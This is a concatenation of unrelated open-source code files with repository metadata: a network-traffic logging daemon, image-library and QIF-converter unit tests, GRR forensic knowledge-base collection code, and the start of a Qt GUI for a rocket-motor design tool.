def dump_indexes(**kwargs):
# Discover base core classes
from caliopen_main.user.core import User
from caliopen_main.contact.objects.contact import Contact
from caliopen_main.message.objects.message import Message
from caliopen_main.common.objects.tag import ResourceTag
from caliopen_storage.core import core_registry
_exports = {
'contact': ['Contact'],
'message': ['Message'],
}
for keys in _exports:
for obj in _exports[keys]:
kls = core_registry.get(obj)
if not kls:
raise Exception('core class %s not found in registry' % obj)
output_file = '%s/%s.json' % (kwargs["output_path"], obj.lower())
dump_index_mapping(kls._index_class, output_file)
def dump_index_mapping(kls, output_file):
"""Output the json definition class."""
m = kls.build_mapping().to_dict()
with open(output_file, 'w') as f:
f.write(json.dumps(m, cls=JSONEncoder,
indent=4, sort_keys=True))
| gpl-3.0 | -7,902,594,706,566,011,000 | 34.741935 | 77 | 0.631769 | false |
Mausy5043/bonediagd | daemon13.py | 1 | 4546 | #!/usr/bin/env python
# Based on previous work by
# Charles Menguy (see: http://stackoverflow.com/questions/10217067/implementing-a-full-python-unix-style-daemon-process)
# and Sander Marechal (see: http://www.jejik.com/articles/2007/02/a_simple_unix_linux_daemon_in_python/)
# Adapted by M.Hendrix [2015]
# daemon13.py measures the network traffic.
# These are all counters, therefore no averaging is needed.
import syslog, traceback
import os, sys, time, math
from libdaemon import Daemon
import ConfigParser
DEBUG = False
IS_SYSTEMD = os.path.isfile('/bin/journalctl')
leaf = os.path.realpath(__file__).split('/')[-2]
class MyDaemon(Daemon):
def run(self):
iniconf = ConfigParser.ConfigParser()
inisection = "13"
home = os.path.expanduser('~')
s = iniconf.read(home + '/' + leaf + '/config.ini')
if DEBUG: print "config file : ", s
if DEBUG: print iniconf.items(inisection)
reportTime = iniconf.getint(inisection, "reporttime")
cycles = iniconf.getint(inisection, "cycles")
samplesperCycle = iniconf.getint(inisection, "samplespercycle")
flock = iniconf.get(inisection, "lockfile")
fdata = iniconf.get(inisection, "resultfile")
samples = samplesperCycle * cycles # total number of samples averaged
sampleTime = reportTime/samplesperCycle # time [s] between samples
cycleTime = samples * sampleTime # time [s] per cycle
data = [] # array for holding sampledata
while True:
try:
startTime = time.time()
result = do_work().split(',')
data = map(int, result)
# report sample average
if (startTime % reportTime < sampleTime):
if DEBUG:print data
averages = data
#averages = sum(data[:]) / len(data)
#if DEBUG:print averages
do_report(averages, flock, fdata)
waitTime = sampleTime - (time.time() - startTime) - (startTime%sampleTime)
if (waitTime > 0):
if DEBUG:print "Waiting {0} s".format(waitTime)
time.sleep(waitTime)
except Exception as e:
if DEBUG:
print "Unexpected error:"
print e.message
syslog.syslog(syslog.LOG_ALERT,e.__doc__)
syslog_trace(traceback.format_exc())
raise
def syslog_trace(trace):
# Log a python stack trace to syslog
log_lines = trace.split('\n')
for line in log_lines:
if line:
syslog.syslog(syslog.LOG_ALERT,line)
def cat(filename):
ret = ""
if os.path.isfile(filename):
with open(filename,'r') as f:
ret = f.read().strip('\n')
return ret
def do_work():
# 6 #datapoints gathered here
# Network traffic
wlIn = 0
wlOut = 0
etIn = 0
etOut = 0
loIn = 0
loOut = 0
list = cat("/proc/net/dev").replace(":"," ").splitlines()
for line in range(2,len(list)):
device = list[line].split()[0]
if device == "lo":
loIn = int(list[line].split()[1])
loOut = int(list[line].split()[9])
if device == "eth0":
etIn = int(list[line].split()[1])
etOut = int(list[line].split()[9])
if device == "wlan0":
wlIn = int(list[line].split()[1])
wlOut = int(list[line].split()[9])
if device == "wlan1":
wlIn += int(list[line].split()[1])
wlOut += int(list[line].split()[9])
return '{0}, {1}, {2}, {3}, {4}, {5}'.format(loIn, loOut, etIn, etOut, wlIn, wlOut)
def do_report(result, flock, fdata):
# Get the time and date in human-readable form and UN*X-epoch...
outDate = time.strftime('%Y-%m-%dT%H:%M:%S, %s')
result = ', '.join(map(str, result))
lock(flock)
with open(fdata, 'a') as f:
f.write('{0}, {1}\n'.format(outDate, result) )
unlock(flock)
def lock(fname):
open(fname, 'a').close()
def unlock(fname):
if os.path.isfile(fname):
os.remove(fname)
if __name__ == "__main__":
daemon = MyDaemon('/tmp/' + leaf + '/13.pid')
if len(sys.argv) == 2:
if 'start' == sys.argv[1]:
daemon.start()
elif 'stop' == sys.argv[1]:
daemon.stop()
elif 'restart' == sys.argv[1]:
daemon.restart()
elif 'foreground' == sys.argv[1]:
# assist with debugging.
print "Debug-mode started. Use <Ctrl>+C to stop."
DEBUG = True
if DEBUG:
logtext = "Daemon logging is ON"
syslog.syslog(syslog.LOG_DEBUG, logtext)
daemon.run()
else:
print "Unknown command"
sys.exit(2)
sys.exit(0)
else:
print "usage: {0!s} start|stop|restart|foreground".format(sys.argv[0])
sys.exit(2)
| mit | -1,613,244,532,009,783,600 | 29.510067 | 120 | 0.604707 | false |
grigorisg9gr/menpo | menpo/image/test/image_basics_test.py | 1 | 4345 | import warnings
import numpy as np
from numpy.testing import assert_allclose
from nose.tools import raises
from pathlib import Path
import menpo
from menpo.image import Image, MaskedImage, BooleanImage
from menpo.shape import PointCloud
from menpo.transform import UniformScale, Translation
def test_image_as_masked():
img = Image(np.random.rand(3, 3, 1), copy=False)
m_img = img.as_masked()
assert(type(m_img) == MaskedImage)
assert_allclose(m_img.pixels, img.pixels)
def test_image_has_nan_values():
img = Image(np.random.rand(1, 3, 3), copy=False)
img.pixels[0, 0, 0] = np.nan
assert img.has_nan_values()
def test_image_no_nan_values():
img = Image(np.random.rand(1, 3, 3), copy=False)
assert not img.has_nan_values()
def test_masked_image_as_unmasked():
m_img = MaskedImage(np.random.rand(1, 3, 3), copy=False)
img = m_img.as_unmasked()
assert(type(img) == Image)
assert_allclose(m_img.pixels, img.pixels)
def test_masked_image_as_unmasked_fill():
m_img = MaskedImage(np.random.rand(1, 3, 3), copy=False)
m_img.mask.pixels[0, 0, 0] = False
img = m_img.as_unmasked(fill=8)
assert(type(img) == Image)
assert_allclose(m_img.pixels[0, 1:, 1:], img.pixels[0, 1:, 1:])
assert_allclose(img.pixels[0, 0, 0], 8.0)
def test_masked_image_as_unmasked_fill_tuple():
m_img = MaskedImage(np.random.rand(3, 3, 3), copy=False)
m_img.mask.pixels[0, 0, 0] = False
img = m_img.as_unmasked(fill=(1, 2, 3))
assert(type(img) == Image)
assert_allclose(m_img.pixels[0, 1:, 1:], img.pixels[0, 1:, 1:])
assert_allclose(img.pixels[:, 0, 0], (1, 2, 3))
@raises(NotImplementedError)
def test_boolean_image_as_masked_raises_not_implemented_error():
b_img = BooleanImage.init_blank((4, 5))
b_img.as_masked()
def test_warp_to_shape_preserves_path():
bb = menpo.io.import_builtin_asset.breakingbad_jpg()
bb2 = bb.rescale(0.1)
assert hasattr(bb2, 'path')
assert bb2.path == bb.path
def test_warp_to_mask_preserves_path():
bb = menpo.io.import_builtin_asset.breakingbad_jpg()
no_op = UniformScale(1.0, n_dims=2)
bb2 = bb.warp_to_mask(BooleanImage.init_blank((10, 10)), no_op)
assert hasattr(bb2, 'path')
assert bb2.path == bb.path
def test_warp_to_shape_boolean_preserves_path():
i1 = BooleanImage.init_blank((10, 10))
i1.path = Path('.')
i2 = i1.rescale(0.8)
assert hasattr(i2, 'path')
assert i2.path == i1.path
def test_init_from_rolled_channels():
p = np.empty([50, 60, 3])
im = Image.init_from_channels_at_back(p)
assert im.n_channels == 3
assert im.height == 50
assert im.width == 60
def test_init_from_channels_at_back_less_dimensions():
p = np.empty([50, 60])
im = Image.init_from_channels_at_back(p)
assert im.n_channels == 1
assert im.height == 50
assert im.width == 60
def test_init_from_pointcloud():
pc = PointCloud.init_2d_grid((10, 10))
im = Image.init_from_pointcloud(pc)
assert im.shape == (9, 9)
def test_init_from_pointcloud_return_transform():
correct_tr = Translation([5, 5])
pc = correct_tr.apply(PointCloud.init_2d_grid((10, 10)))
im, tr = Image.init_from_pointcloud(pc, return_transform=True)
assert im.shape == (9, 9)
assert_allclose(tr.as_vector(), -correct_tr.as_vector())
def test_init_from_pointcloud_attach_group():
pc = PointCloud.init_2d_grid((10, 10))
im = Image.init_from_pointcloud(pc, group='test')
assert im.shape == (9, 9)
assert im.n_landmark_groups == 1
def test_init_from_pointcloud_boundary():
pc = PointCloud.init_2d_grid((10, 10))
im = Image.init_from_pointcloud(pc, boundary=5)
print(im.shape)
assert im.shape == (19, 19)
def test_bounds_2d():
im = Image.init_blank((50, 30))
assert_allclose(im.bounds(), ((0, 0), (49, 29)))
def test_bounds_3d():
im = Image.init_blank((50, 30, 10))
assert_allclose(im.bounds(), ((0, 0, 0), (49, 29, 9)))
def test_constrain_landmarks_to_bounds():
im = Image.init_blank((10, 10))
im.landmarks['test'] = PointCloud.init_2d_grid((20, 20))
with warnings.catch_warnings():
warnings.simplefilter('ignore')
im.constrain_landmarks_to_bounds()
assert not im.has_landmarks_outside_bounds()
assert_allclose(im.landmarks['test'].bounds(), im.bounds())
| bsd-3-clause | -8,169,848,640,593,623,000 | 28.557823 | 67 | 0.650403 | false |
myfreecomm/fixofx | test/ofxtools_qif_converter.py | 1 | 9183 | # Copyright 2005-2010 Wesabe, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.insert(0, '../3rdparty')
sys.path.insert(0, '../lib')
import ofxtools
import textwrap
import unittest
from pyparsing import ParseException
from time import localtime, strftime
class QifConverterTests(unittest.TestCase):
def test_bank_stmttype(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.accttype, "CHECKING")
def test_ccard_stmttype(self):
qiftext = textwrap.dedent('''\
!Type:CCard
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.accttype, "CREDITCARD")
def test_no_stmttype(self):
qiftext = textwrap.dedent('''\
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.accttype, "CHECKING")
def test_no_txns(self):
qiftext = textwrap.dedent('''\
!Type:Bank
''')
today = strftime("%Y%m%d", localtime())
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.start_date, today)
self.assertEqual(converter.end_date, today)
def test_us_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20050113"))
def test_uk_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D13/01/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20050113"))
def test_ambiguous_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D12/01/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20051201"))
def test_mixed_us_dates(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/12/2005
^
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20050112"))
self.assertTrue(converter.txns_by_date.has_key("20050113"))
def test_mixed_uk_dates(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D12/01/2005
^
D13/01/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20050112"))
self.assertTrue(converter.txns_by_date.has_key("20050113"))
def test_slashfree_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D12012005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20051201"))
def test_unparseable_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
DFnargle
^
''')
self.assertRaises(ValueError, ofxtools.QifConverter, qiftext)
def test_len_eight_no_int_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
DAAAAAAAA
^
''')
self.assertRaises(ValueError, ofxtools.QifConverter, qiftext)
def test_asc_dates(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/13/2005
^
D01/27/2005
^
D02/01/2005
^
D02/01/2005
^
D02/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.start_date, "20050113")
self.assertEqual(converter.end_date, "20050213")
self.assertEqual(len(converter.txns_by_date.keys()), 4)
def test_desc_dates(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D02/13/2005
^
D02/01/2005
^
D02/01/2005
^
D01/27/2005
^
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.start_date, "20050113")
self.assertEqual(converter.end_date, "20050213")
self.assertEqual(len(converter.txns_by_date.keys()), 4)
def test_mixed_dates(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D02/01/2005
^
D02/13/2005
^
D01/13/2005
^
D02/01/2005
^
D01/27/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.start_date, "20050113")
self.assertEqual(converter.end_date, "20050213")
self.assertEqual(len(converter.txns_by_date.keys()), 4)
def test_default_currency(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
^
''')
converter = ofxtools.QifConverter(qiftext)
ofx102 = converter.to_ofx102()
self.assertTrue(ofx102.find('<CURDEF>USD') != -1)
def test_found_currency(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
^EUR
''')
converter = ofxtools.QifConverter(qiftext)
ofx102 = converter.to_ofx102()
self.assertTrue(ofx102.find('<CURDEF>EUR') != -1)
def test_explicit_currency(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
^
''')
converter = ofxtools.QifConverter(qiftext, curdef='GBP')
ofx102 = converter.to_ofx102()
self.assertTrue(ofx102.find('<CURDEF>GBP') != -1)
def test_amount2(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D02/01/2005
U25.42
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20050201"][0]
self.assertEqual(txn["Amount"], "25.42")
def test_bad_amount_precision(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.930
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20070125"][0]
self.assertEqual(txn["Amount"], "417.93")
def test_dash_amount(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D02/01/2005
T25.42
^
D02/01/2005
T-
^
''')
converter = ofxtools.QifConverter(qiftext)
txn_list = converter.txns_by_date["20050201"]
self.assertEqual(len(txn_list), 1)
txn = txn_list[0]
self.assertEqual(txn["Amount"], "25.42")
def test_trailing_minus(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D08/06/2008
T26.24-
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20080806"][0]
self.assertEqual(txn["Amount"], "-26.24")
def test_n_a_number(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
NN/A
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20070125"][0]
self.assertEqual(txn.has_key("Number"), False)
def test_creditcard_number(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
NXXXX-XXXX-XXXX-1234
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20070125"][0]
self.assertEqual(txn.has_key("Number"), False)
def test_creditcard_stmt_number(self):
qiftext = textwrap.dedent('''\
!Type:CCard
D01/25/2007
T417.93
N1234
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20070125"][0]
self.assertEqual(txn.has_key("Number"), False)
def test_check_stmt_number(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
N1234
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20070125"][0]
self.assertEqual(txn.get("Type"), "CHECK")
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -6,239,589,236,136,788,000 | 27.255385 | 74 | 0.556354 | false |
simsong/grr-insider | lib/artifact.py | 1 | 15969 | #!/usr/bin/env python
"""Base classes for artifacts."""
import logging
from grr.lib import aff4
from grr.lib import artifact_lib
from grr.lib import config_lib
from grr.lib import flow
from grr.lib import rdfvalue
from grr.lib import registry
from grr.lib import utils
class AFF4ResultWriter(object):
"""A wrapper class to allow writing objects to the AFF4 space."""
def __init__(self, path, aff4_type, aff4_attribute, mode):
self.path = path
self.aff4_type = aff4_type
self.aff4_attribute = aff4_attribute
self.mode = mode
def GetArtifactKnowledgeBase(client_obj, allow_uninitialized=False):
"""This generates an artifact knowledge base from a GRR client.
Args:
client_obj: A GRRClient object which is opened for reading.
allow_uninitialized: If True we accept an uninitialized knowledge_base.
Returns:
A KnowledgeBase semantic value.
Raises:
ArtifactProcessingError: If called when the knowledge base has not been
initialized.
KnowledgeBaseUninitializedError: If we failed to initialize the knowledge
base.
This is needed so that the artifact library has a standardized
interface to the data that is actually stored in the GRRClient object in
the GRR datastore.
We expect that the client KNOWLEDGE_BASE is already filled out through the,
KnowledgeBaseInitialization flow, but attempt to make some intelligent
guesses if things failed.
"""
client_schema = client_obj.Schema
kb = client_obj.Get(client_schema.KNOWLEDGE_BASE)
if not allow_uninitialized and (not kb or not kb.os):
raise artifact_lib.KnowledgeBaseUninitializedError(
"Attempting to retreive uninitialized KnowledgeBase for %s. Failing." %
client_obj.urn)
if not kb:
kb = client_schema.KNOWLEDGE_BASE()
SetCoreGRRKnowledgeBaseValues(kb, client_obj)
if kb.os == "Windows":
# Add fallback values.
if not kb.environ_allusersappdata and kb.environ_allusersprofile:
# Guess if we don't have it already.
if kb.os_major_version >= 6:
kb.environ_allusersappdata = u"c:\\programdata"
kb.environ_allusersprofile = u"c:\\programdata"
else:
kb.environ_allusersappdata = (u"c:\\documents and settings\\All Users\\"
"Application Data")
kb.environ_allusersprofile = u"c:\\documents and settings\\All Users"
return kb
def SetCoreGRRKnowledgeBaseValues(kb, client_obj):
"""Set core values from GRR into the knowledgebase."""
client_schema = client_obj.Schema
kb.hostname = utils.SmartUnicode(client_obj.Get(client_schema.FQDN, ""))
if not kb.hostname:
kb.hostname = utils.SmartUnicode(client_obj.Get(client_schema.HOSTNAME, ""))
versions = client_obj.Get(client_schema.OS_VERSION)
if versions and versions.versions:
kb.os_major_version = versions.versions[0]
kb.os_minor_version = versions.versions[1]
client_os = client_obj.Get(client_schema.SYSTEM)
if client_os:
kb.os = utils.SmartUnicode(client_obj.Get(client_schema.SYSTEM))
class KnowledgeBaseInitializationFlow(flow.GRRFlow):
"""Flow that atttempts to initialize the knowledge base.
This flow processes all artifacts specified by the Artifacts.knowledge_base
config. We search for dependent artifacts following the dependency tree
specified by the "provides" attributes in the artifact definitions.
We don't try to fulfill dependencies in the tree order, the reasoning is that
some artifacts may fail, and some artifacts provide the same dependency.
Instead we take an iterative approach and keep requesting artifacts until
all dependencies have been met. If there is more than one artifact that
provides a dependency we will collect them all as they likely have
different performance characteristics, e.g. accuracy and client impact.
"""
category = "/Collectors/"
behaviours = flow.GRRFlow.behaviours + "ADVANCED"
@flow.StateHandler(next_state="ProcessBootstrap")
def Start(self):
"""For each artifact, create subflows for each collector."""
self.client = aff4.FACTORY.Open(self.client_id, token=self.token)
kb = rdfvalue.KnowledgeBase()
SetCoreGRRKnowledgeBaseValues(kb, self.client)
if not kb.os:
raise flow.FlowError("Client OS not set for: %s, cannot initialize"
" KnowledgeBase" % self.client_id)
self.state.Register("knowledge_base", kb)
self.state.Register("fulfilled_deps", [])
self.state.Register("partial_fulfilled_deps", set())
self.state.Register("all_deps", set())
self.state.Register("in_flight_artifacts", [])
self.state.Register("awaiting_deps_artifacts", [])
self.state.Register("completed_artifacts", [])
self.CallFlow("BootStrapKnowledgeBaseFlow", next_state="ProcessBootstrap")
def _GetDependencies(self):
bootstrap_artifact_names = artifact_lib.ArtifactRegistry.GetArtifactNames(
os_name=self.state.knowledge_base.os, collector_action="Bootstrap")
kb_base_set = set(config_lib.CONFIG["Artifacts.knowledge_base"])
kb_add = set(config_lib.CONFIG["Artifacts.knowledge_base_additions"])
kb_skip = set(config_lib.CONFIG["Artifacts.knowledge_base_skip"])
kb_set = kb_base_set.union(kb_add) - kb_skip
# Ignore bootstrap dependencies since they have already been fulfilled.
no_deps_names = artifact_lib.ArtifactRegistry.GetArtifactNames(
os_name=self.state.knowledge_base.os,
name_list=kb_set,
exclude_dependents=True) - bootstrap_artifact_names
name_deps, all_deps = artifact_lib.ArtifactRegistry.SearchDependencies(
self.state.knowledge_base.os, kb_set)
# We only retrieve artifacts that are explicitly listed in
# Artifacts.knowledge_base + additions - skip.
name_deps = name_deps.intersection(kb_set)
self.state.all_deps = all_deps
# Ignore bootstrap dependencies since they have already been fulfilled.
awaiting_deps_artifacts = list(name_deps - no_deps_names
- bootstrap_artifact_names)
return no_deps_names, all_deps, awaiting_deps_artifacts
@flow.StateHandler(next_state="ProcessBase")
def ProcessBootstrap(self, responses):
"""Process the bootstrap responses."""
if not responses.success:
raise flow.FlowError("Failed to run BootStrapKnowledgeBaseFlow. %s" %
responses.status)
# Store bootstrap responses
if responses.First():
for key, value in responses.First().ToDict().items():
self.state.fulfilled_deps.append(key)
self.state.knowledge_base.Set(key, value)
(no_deps_names, self.state.all_deps,
self.state.awaiting_deps_artifacts) = self._GetDependencies()
# Schedule anything with no deps next
# Send each artifact independently so we can track which artifact produced
# it when it comes back.
# TODO(user): tag SendReplys with the flow that generated them.
for artifact_name in no_deps_names:
self.state.in_flight_artifacts.append(artifact_name)
self.CallFlow("ArtifactCollectorFlow", artifact_list=[artifact_name],
knowledge_base=self.state.knowledge_base,
store_results_in_aff4=False, next_state="ProcessBase",
request_data={"artifact_name": artifact_name})
def _ScheduleCollection(self):
# Schedule any new artifacts for which we have now fulfilled dependencies.
for artifact_name in self.state.awaiting_deps_artifacts:
artifact_obj = artifact_lib.ArtifactRegistry.artifacts[artifact_name]
deps = artifact_obj.GetArtifactPathDependencies()
if set(deps).issubset(self.state.fulfilled_deps):
self.state.in_flight_artifacts.append(artifact_name)
self.state.awaiting_deps_artifacts.remove(artifact_name)
self.CallFlow("ArtifactCollectorFlow", artifact_list=[artifact_name],
store_results_in_aff4=False, next_state="ProcessBase",
request_data={"artifact_name": artifact_name},
knowledge_base=self.state.knowledge_base)
# If we're not done but not collecting anything, start accepting the partial
# dependencies as full, and see if we can complete.
if (self.state.awaiting_deps_artifacts and
not self.state.in_flight_artifacts):
if self.state.partial_fulfilled_deps:
partial = self.state.partial_fulfilled_deps.pop()
self.Log("Accepting partially fulfilled dependency: %s", partial)
self.state.fulfilled_deps.append(partial)
self._ScheduleCollection()
@flow.StateHandler(next_state="ProcessBase")
def ProcessBase(self, responses):
"""Process any retrieved artifacts."""
artifact_name = responses.request_data["artifact_name"]
self.state.in_flight_artifacts.remove(artifact_name)
self.state.completed_artifacts.append(artifact_name)
if not responses.success:
self.Log("Failed to get artifact %s. Status: %s", artifact_name,
responses.status)
else:
deps = self.SetKBValue(responses.request_data["artifact_name"],
responses)
if deps:
# If we fulfilled a dependency, make sure we have collected all
# artifacts that provide the dependency before marking it as fulfilled.
for dep in deps:
required_artifacts = artifact_lib.ArtifactRegistry.GetArtifactNames(
os_name=self.state.knowledge_base.os, provides=[dep])
if required_artifacts.issubset(self.state.completed_artifacts):
self.state.fulfilled_deps.append(dep)
else:
self.state.partial_fulfilled_deps.add(dep)
else:
self.Log("Failed to get artifact %s. Artifact failed to return value.",
artifact_name)
if self.state.awaiting_deps_artifacts:
# Schedule any new artifacts for which we have now fulfilled dependencies.
self._ScheduleCollection()
# If we fail to fulfil deps for things we're supposed to collect, raise
# an error.
if (self.state.awaiting_deps_artifacts and
not self.state.in_flight_artifacts):
missing_deps = list(self.state.all_deps.difference(
self.state.fulfilled_deps))
raise flow.FlowError("KnowledgeBase initialization failed as the "
"following artifacts had dependencies that could "
"not be fulfilled %s. Missing: %s" %
(self.state.awaiting_deps_artifacts, missing_deps))
def SetKBValue(self, artifact_name, responses):
"""Set values in the knowledge base based on responses."""
artifact_obj = artifact_lib.ArtifactRegistry.artifacts[artifact_name]
if not responses:
return None
provided = set() # Track which deps have been provided.
for response in responses:
if isinstance(response, rdfvalue.KnowledgeBaseUser):
# MergeOrAddUser will update or add a user based on the attributes
# returned by the artifact in the KnowledgeBaseUser.
attrs_provided, merge_conflicts = (
self.state.knowledge_base.MergeOrAddUser(response))
provided.update(attrs_provided)
for key, old_val, val in merge_conflicts:
self.Log("KnowledgeBaseUser merge conflict in %s. Old value: %s, "
"Newly written value: %s", key, old_val, val)
elif len(artifact_obj.provides) == 1:
# This artifact provides a single KB attribute.
value = None
provides = artifact_obj.provides[0]
if isinstance(response, rdfvalue.RDFString):
value = str(responses.First())
elif artifact_obj.collectors[0].action == "GetRegistryValue":
value = responses.First().registry_data.GetValue()
if value:
logging.debug("Set KB %s to %s", provides, value)
self.state.knowledge_base.Set(provides, value)
provided.add(provides)
else:
logging.debug("Empty KB return value for %s", provides)
else:
# We are setting a knowledgebase value for something with multiple
# provides. This isn't currently supported.
raise RuntimeError("Attempt to process broken knowledge base artifact")
return provided
def CopyUsersFromKnowledgeBase(self, client):
"""Copy users from knowledgebase to USER.
TODO(user): deprecate USER completely in favour of KNOWLEDGE_BASE.user
Args:
client: client object open for writing
"""
usernames = []
user_list = client.Schema.USER()
for kbuser in self.state.knowledge_base.users:
user_list.Append(rdfvalue.User().FromKnowledgeBaseUser(kbuser))
if kbuser.username:
usernames.append(kbuser.username)
# Store it now
client.AddAttribute(client.Schema.USER, user_list)
client.AddAttribute(client.Schema.USERNAMES(
" ".join(usernames)))
@flow.StateHandler()
def End(self, unused_responses):
"""Finish up and write the results."""
client = aff4.FACTORY.Open(self.client_id, mode="rw", token=self.token)
client.Set(client.Schema.KNOWLEDGE_BASE, self.state.knowledge_base)
self.CopyUsersFromKnowledgeBase(client)
client.Flush()
self.Notify("ViewObject", client.urn, "Knowledge Base Updated.")
self.SendReply(self.state.knowledge_base)
def UploadArtifactYamlFile(file_content, base_urn=None, token=None,
overwrite=True):
"""Upload a yaml or json file as an artifact to the datastore."""
_ = overwrite
if not base_urn:
base_urn = aff4.ROOT_URN.Add("artifact_store")
with aff4.FACTORY.Create(base_urn, aff4_type="RDFValueCollection",
token=token, mode="rw") as artifact_coll:
# Iterate through each artifact adding it to the collection.
for artifact_value in artifact_lib.ArtifactsFromYaml(file_content):
artifact_coll.Add(artifact_value)
logging.info("Uploaded artifact %s to %s", artifact_value.name, base_urn)
return base_urn
def LoadArtifactsFromDatastore(artifact_coll_urn=None, token=None,
overwrite_if_exists=True):
"""Load artifacts from the data store."""
loaded_artifacts = []
if not artifact_coll_urn:
artifact_coll_urn = aff4.ROOT_URN.Add("artifact_store")
with aff4.FACTORY.Create(artifact_coll_urn, aff4_type="RDFValueCollection",
token=token, mode="rw") as artifact_coll:
for artifact_value in artifact_coll:
artifact_lib.ArtifactRegistry.RegisterArtifact(
artifact_value, source="datastore:%s" % artifact_coll_urn,
overwrite_if_exists=overwrite_if_exists)
loaded_artifacts.append(artifact_value)
logging.debug("Loaded artifact %s from %s", artifact_value.name,
artifact_coll_urn)
# Once all artifacts are loaded we can validate, as validation of dependencies
# requires the group are all loaded before doing the validation.
for artifact_value in loaded_artifacts:
artifact_value.Validate()
class GRRArtifactMappings(object):
"""SemanticProto to AFF4 storage mappings.
Class defining mappings between RDFValues collected by Artifacts, and the
location they are stored in the AFF4 hierarchy.
Each entry in the map contains:
1. Location stored relative to the client.
2. Name of the AFF4 type.
3. Name of the attribute to be changed.
4. Method for adding the RDFValue to the Attribute (Set, Append)
"""
rdf_map = {
"SoftwarePackage": ("info/software", "InstalledSoftwarePackages",
"INSTALLED_PACKAGES", "Append")
}
class ArtifactLoader(registry.InitHook):
"""Loads artifacts from the datastore and from the filesystem.
Datastore gets loaded second so it can override Artifacts in the files.
"""
pre = ["AFF4InitHook"]
def RunOnce(self):
for path in config_lib.CONFIG["Artifacts.artifact_dirs"]:
artifact_lib.LoadArtifactsFromDir(path)
| apache-2.0 | 2,216,893,775,539,972,600 | 40.157216 | 80 | 0.6904 | false |
tuxxi/OpenBurn | openburn/ui/mainwindow.py | 1 | 3263 | from qtpy.QtWidgets import (QWidget, QFrame, QMainWindow, QMenuBar, QStatusBar, QAction, QApplication,
QTabWidget, QVBoxLayout)
from qtpy.QtGui import QIcon
from openburn import RESOURCE_PATH
from openburn.ui.dialogs.about import AboutDialog
from openburn.ui.designtab import DesignTab
class MainWindow(QMainWindow):
"""OpenBurn's main window"""
title = "OpenBurn"
def __init__(self):
super(MainWindow, self).__init__()
self.setWindowTitle(self.title)
self.setGeometry(100, 100, 800, 600)
self.setWindowIcon(QIcon(RESOURCE_PATH + "icons/nakka-finocyl.gif"))
self.create_default_widgets()
self.setup_ui()
def create_default_widgets(self):
"""Creates static widgets such as menubar and statusbar"""
def create_menubar():
"""Create menu bar and populate it with sub menu actions"""
def file_menu():
"""Create a file submenu"""
self.file_sub_menu = self.menubar.addMenu('File')
self.open_action = QAction('Open File', self)
self.open_action.setStatusTip('Open a new design')
self.open_action.setShortcut('CTRL+O')
# self.open_action.triggered.connect(self.open_file)
self.exit_action = QAction('Exit', self)
self.exit_action.setStatusTip('Exit the application.')
self.exit_action.setShortcut('CTRL+Q')
self.exit_action.triggered.connect(QApplication.quit)
self.file_sub_menu.addAction(self.open_action)
self.file_sub_menu.addAction(self.exit_action)
def edit_menu():
self.edit_dub_menu = self.menubar.addMenu('Edit')
def tools_menu():
self.edit_dub_menu = self.menubar.addMenu('Tools')
def help_menu():
"""Create help submenu"""
